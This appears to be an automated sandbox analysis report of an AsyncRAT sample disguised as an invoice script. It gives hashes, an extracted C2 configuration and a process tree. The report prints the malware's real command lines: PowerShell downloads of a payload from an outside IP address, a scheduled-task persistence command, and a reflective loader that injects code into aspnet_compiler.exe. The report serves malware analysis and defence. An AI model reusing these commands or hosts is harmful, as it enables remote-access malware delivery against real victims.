asyncrat | d0002a8438d0820af32a1a32e83af831367c1234b5c3c5fbd9c511ace5f37c97

Resubmissions

30-05-2024 18:52

240530-xh78lshd77 10

30-05-2024 15:40

240530-s38yesee27 10

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30-05-2024 18:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice#0327629531.wsf
Size

107KB
MD5

266cc8fd5a88ebdb132fd89ceba28ad4
SHA1

0a16abdb0a57fa6c7da646e46c2cb8fd8172d31f
SHA256

15ac8251a8b9234d8877a8b5773180d1908c8f24387f4694ccd2fd7391381ea6
SHA512

9debde79a8d543b9dbd9200733fd4989c7da38b283fdfbd1b6529001610f96d876cfd3c1c98d50fe925e476b52c039d8734627cb755f96f55124bbcee849424d
SSDEEP

1536:JxxxxxxxxxxxFxxxxxxxxxxx0xxxxxxxxxxxHD53g7xxxxxxxxxxxSxxxxxxxxxv:ab

Score

10^/10

asyncrat karem execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://162.244.210.92:333/kok.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/latest-v0.12.x/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Karem

kareemovic11.duckdns.org:6606

kareemovic11.duckdns.org:7707

kareemovic11.duckdns.org:8808

Mutex

AsyncMutex_kinsdlmsjnsidhuybf

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

5 4564 WScript.exe
Downloads MZ/PE file

flow	pid	process
5	4564	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

Processes:

AutoHotkey.exeAutoHotkey.exe

pid process

4184 AutoHotkey.exe
3944 AutoHotkey.exe

pid	process
4184	AutoHotkey.exe
3944	AutoHotkey.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 5068 set thread context of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 2908 set thread context of 1512	2908	powershell.exe	aspnet_compiler.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2536 powershell.exe
2908 powershell.exe
2264 powershell.exe
3660 powershell.exe
5068 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

WScript.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings WScript.exe

pid	process
2536	powershell.exe
2908	powershell.exe
2264	powershell.exe
3660	powershell.exe
5068	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	WScript.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenode.exepowershell.exeaspnet_compiler.exepowershell.exenode.exepowershell.exe

pid	process
3016	powershell.exe
3016	powershell.exe
2312	powershell.exe
2312	powershell.exe
4828	powershell.exe
4828	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
3660	powershell.exe
3660	powershell.exe
4324	node.exe
4324	node.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
4112	aspnet_compiler.exe
2536	powershell.exe
2536	powershell.exe
4524	node.exe
4524	node.exe
2908	powershell.exe
2908	powershell.exe
2908	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	4112	aspnet_compiler.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

AutoHotkey.exeAutoHotkey.exe

pid process

4184 AutoHotkey.exe
4184 AutoHotkey.exe
3944 AutoHotkey.exe
3944 AutoHotkey.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

AutoHotkey.exeAutoHotkey.exe

pid process

4184 AutoHotkey.exe
4184 AutoHotkey.exe
3944 AutoHotkey.exe
3944 AutoHotkey.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

4112 aspnet_compiler.exe

pid	process
4184	AutoHotkey.exe
4184	AutoHotkey.exe
3944	AutoHotkey.exe
3944	AutoHotkey.exe

pid	process
4184	AutoHotkey.exe
4184	AutoHotkey.exe
3944	AutoHotkey.exe
3944	AutoHotkey.exe

pid	process
4112	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

WScript.exeWScript.execmd.exeAutoHotkey.execmd.exenode.execmd.exepowershell.exeAutoHotkey.execmd.exenode.execmd.exepowershell.exe

description	pid	process	target process
PID 4564 wrote to memory of 3016	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 3016	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 2312	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 2312	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 4828	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 4828	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 968	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 968	4564	WScript.exe	powershell.exe
PID 4564 wrote to memory of 2472	4564	WScript.exe	WScript.exe
PID 4564 wrote to memory of 2472	4564	WScript.exe	WScript.exe
PID 2472 wrote to memory of 1876	2472	WScript.exe	cmd.exe
PID 2472 wrote to memory of 1876	2472	WScript.exe	cmd.exe
PID 2472 wrote to memory of 4184	2472	WScript.exe	AutoHotkey.exe
PID 2472 wrote to memory of 4184	2472	WScript.exe	AutoHotkey.exe
PID 2472 wrote to memory of 4184	2472	WScript.exe	AutoHotkey.exe
PID 1876 wrote to memory of 2264	1876	cmd.exe	powershell.exe
PID 1876 wrote to memory of 2264	1876	cmd.exe	powershell.exe
PID 4184 wrote to memory of 3660	4184	AutoHotkey.exe	powershell.exe
PID 4184 wrote to memory of 3660	4184	AutoHotkey.exe	powershell.exe
PID 4184 wrote to memory of 3660	4184	AutoHotkey.exe	powershell.exe
PID 4184 wrote to memory of 5092	4184	AutoHotkey.exe	cmd.exe
PID 4184 wrote to memory of 5092	4184	AutoHotkey.exe	cmd.exe
PID 4184 wrote to memory of 5092	4184	AutoHotkey.exe	cmd.exe
PID 5092 wrote to memory of 4324	5092	cmd.exe	node.exe
PID 5092 wrote to memory of 4324	5092	cmd.exe	node.exe
PID 5092 wrote to memory of 4324	5092	cmd.exe	node.exe
PID 4324 wrote to memory of 920	4324	node.exe	cmd.exe
PID 4324 wrote to memory of 920	4324	node.exe	cmd.exe
PID 4324 wrote to memory of 920	4324	node.exe	cmd.exe
PID 920 wrote to memory of 5068	920	cmd.exe	powershell.exe
PID 920 wrote to memory of 5068	920	cmd.exe	powershell.exe
PID 920 wrote to memory of 5068	920	cmd.exe	powershell.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 4112	5068	powershell.exe	aspnet_compiler.exe
PID 3944 wrote to memory of 2536	3944	AutoHotkey.exe	powershell.exe
PID 3944 wrote to memory of 2536	3944	AutoHotkey.exe	powershell.exe
PID 3944 wrote to memory of 2536	3944	AutoHotkey.exe	powershell.exe
PID 3944 wrote to memory of 2656	3944	AutoHotkey.exe	cmd.exe
PID 3944 wrote to memory of 2656	3944	AutoHotkey.exe	cmd.exe
PID 3944 wrote to memory of 2656	3944	AutoHotkey.exe	cmd.exe
PID 2656 wrote to memory of 4524	2656	cmd.exe	node.exe
PID 2656 wrote to memory of 4524	2656	cmd.exe	node.exe
PID 2656 wrote to memory of 4524	2656	cmd.exe	node.exe
PID 4524 wrote to memory of 3812	4524	node.exe	cmd.exe
PID 4524 wrote to memory of 3812	4524	node.exe	cmd.exe
PID 4524 wrote to memory of 3812	4524	node.exe	cmd.exe
PID 3812 wrote to memory of 2908	3812	cmd.exe	powershell.exe
PID 3812 wrote to memory of 2908	3812	cmd.exe	powershell.exe
PID 3812 wrote to memory of 2908	3812	cmd.exe	powershell.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe
PID 2908 wrote to memory of 1512	2908	powershell.exe	aspnet_compiler.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#0327629531.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://162.244.210.92:333/kok.jpg' -Destination 'C:\Users\Public\bbbb.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('KaR3Em', $ta, 6, $null, $null, 3);"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2264
- - C:\Users\Public\AutoHotkey.exe
    "C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3660
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Users\Public\node.exe
        
        C:\Users\Public\node.exe C:\Users\Public\run.js
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
        7⤵
        Suspicious use of SetThreadContext
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5068
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4112

C:\Users\Public\AutoHotkey.exe
C:\\Users\\Public\\AutoHotkey.exe
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3944
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Users\Public\node.exe
    C:\Users\Public\node.exe C:\Users\Public\run.js
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
        5⤵
        Suspicious use of SetThreadContext
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2908
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:1512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
61e2e57471d559f5f6813c0a7995c075

SHA1
33c621541bc0892ddab1b65345a348c14af566e5

SHA256
c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

SHA512
9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
64565b5b837feca7ec75ae007761e42a

SHA1
ab509d3102cb94ba00c097b131cff48c967ef54c

SHA256
4f71cf59a481912f5172a92c09c0182f95a9a679f3d533603f14e29878da980d

SHA512
0d20c85e4284c713c2132b913f98a01d4ce707026a3c605ef51a030d92a7425cf74ad0e4e85966e4cdb5c4c40605dd9f3bc7c2fd8c810e842b5346bd137f232b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a0f65572681b7b3559c2378240653117

SHA1
e0cd9bd0829a47c094a8402f80b00340b1447e6d

SHA256
7e5c76773533c64ad5087bf8e21501c47c6fabe3eb90501af45f266e54433c99

SHA512
40c32e485720a101f2892ab8bc6558c8e938dde6b45890a13559cc2a85a5e68c91f75a8a03c52fd188c4b9cee7c7673afb4f4b4919b9831e9ad02dd897ea39e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23aa40b5e1e4fca90f8c7d35e8f12ade

SHA1
00014f9ab245465bc617df83278a93c972c29cc3

SHA256
eb3b081f5c392201b0834cc9c92f53f7063c65542b8f2767bde1b34dda6ba04d

SHA512
2818d771d7d3a1952e6f87fc6abcbcc8573c5e297832f6eb63c88af1835145cd2d2a3b3fa9a761c5cd36e2c949d19a64642cb06a84fc348f013d1139013f3200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
5a5ec38138d9d9a6e43872b43cadadff

SHA1
be3e8552b8693ad39b9c662844dcc6fdd3e85d36

SHA256
b7da38fafebaf2eb9056ff29e1fbd0dd24008b882f1d4b52dc8e062d1cee440e

SHA512
184f52b8f75a71455cea14bd9896900729abb7ec1381fdc5fab0687074f6cb8bde1c5e7d7bbba4944b20ebbc01012e36e1b5df05eecc550825b0b7cc55591c6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f970a4f98106b2a50cbb727d919ecbbf

SHA1
c393622ebfb1b03548da49b1eef4a79b4e1b252d

SHA256
497193e15e811a7781b29459aceea0a29d9550d08c72567a1acf08d3d0bdec4e

SHA512
588891d5432a5e9a430b99150d05545531d4c5be453674fa983b3ad7d68b6b2c0166a87e6e77c158c24ff8395a373fe43f1e678f8eb91d1f91d3e4e876c7651b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
ffd4bcb21f59c34256fe96b2edd8e91f

SHA1
fe7a76afe9f49eccbb43c471fea8d0de12abdd65

SHA256
9851f42898db0b3b802acc58270997dc68fc2baa2537e08e5c7d5ece6adf3131

SHA512
e0bb0df493de86105f900dfd9ed85460234e7f90f18d34f2a73aae35c9ed0e67b3a1487af3954301b265b97846cfd4f9457481034294e7771e7c54b08e638438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abf9290793799558a17b4643d3114d6a

SHA1
ad1cfae3a1fd1aae092cf3401abb0ba7c01de566

SHA256
079ab91d9e2efefd728a33fe628723b322f3a107971426e77ff8ac2ea4a25239

SHA512
3667037a1ac952a77bdea0587dc0b61ac598c351006be1c1e27d049be89f73d654150a5ab1f6aa76973d2c994e937e2990ffbad26f8e9f976262165523588ea5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54ad79c0cc7e3e3d9ba9c0bb49539da3

SHA1
a79cc25158d64d7ea9bd828c59784928da42a73f

SHA256
f8ff35429b0c4d720288fdcd836c6b35612bbfe1e27ab06fbfde64986df3bc18

SHA512
335c2e77de9ad1e8226671ca296551cf44895e4b9c21077899c09304114966c8d2375262476c9022053b322a9c954eada8f1a1e7345a5d488b71c05890e11d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
da1f6139773b9d1beeca6831b97f71f9

SHA1
3fe5e2a734d0ed80af26c22d202c6719063b1850

SHA256
caa86d2e23823960d5962262d2ae07007b2522d742d853b81bce76df0d3d9184

SHA512
d160c9e198bf15ca461636f42ece26bf075cab418d687947722f664dafdb6943ef36e105ec099b9867f6bbbc423cf6cfe2ae38e2647e8fe388884a23ebf65e2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_weqmhbcu.c2i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Auto.vbs

Filesize
435B

MD5
a5b25c095336368b68172d0eec88069e

SHA1
47b0b0a229e14d2125feb81c5168a7cf83b04fd1

SHA256
47d7c3b0b2b75fabf29d3b17fa4fa9d0290b26aa5d79ecb875075930e8320a5d

SHA512
c3f49848734b04d7863e1dca88a000b30e41dcbebb2867046e5957e52b93e7cb49cf4f235fb58bd698aa9a2831af5570bdfa4b44d37d7f86e66d577c0f3b29cf

Download Submit
C:\Users\Public\AutoHotkey

Filesize
339B

MD5
2312ab36e3363bfa8f217c14354aba68

SHA1
736c5cb239a94007863c03c68705b890fd051302

SHA256
c53105c99521502a13e4dd32fa591a52b4b35026c68de86aa34f68532ff94769

SHA512
dcd58e38538b9aee53fa4d9b51e563e4e42bf9c7763d2094261b3de11dd21617bcb4bb8c39f86da9409c84b2b0e52a17a56a4aa1c832a0df47201576fd91860b

Download Submit
C:\Users\Public\AutoHotkey.exe

Filesize
774KB

MD5
e63e2669a293c1a6709c373f208a48cf

SHA1
489957991f7c59ec748fb4951fa0b2dd676c8998

SHA256
b740b8ea604a8b6ee1864353cfbbcd6778187486cc408d750c7a1a93bc6a0a0c

SHA512
82655f6110ffd9fcca1572b593ad0bef51974da5a18bdecc79ee88f8d56e14157b5349fadac4f27a8df4e6537165415acb6670fa0c453c5131d67d2500b5dde9

Download Submit
C:\Users\Public\Execute.txt

Filesize
7B

MD5
40cd014b7b6251e3a22e6a45a73a64e1

SHA1
6ea36ce8d4940505e9a2c8fea5db868cd8b3d440

SHA256
e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1

SHA512
776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea

Download Submit
C:\Users\Public\Gettype.txt

Filesize
7B

MD5
9221b7b54ed96de7281d31f8ae35be6a

SHA1
223fad426aa8c753546501b0643ee1720b57bff0

SHA256
8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a

SHA512
be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d

Download Submit
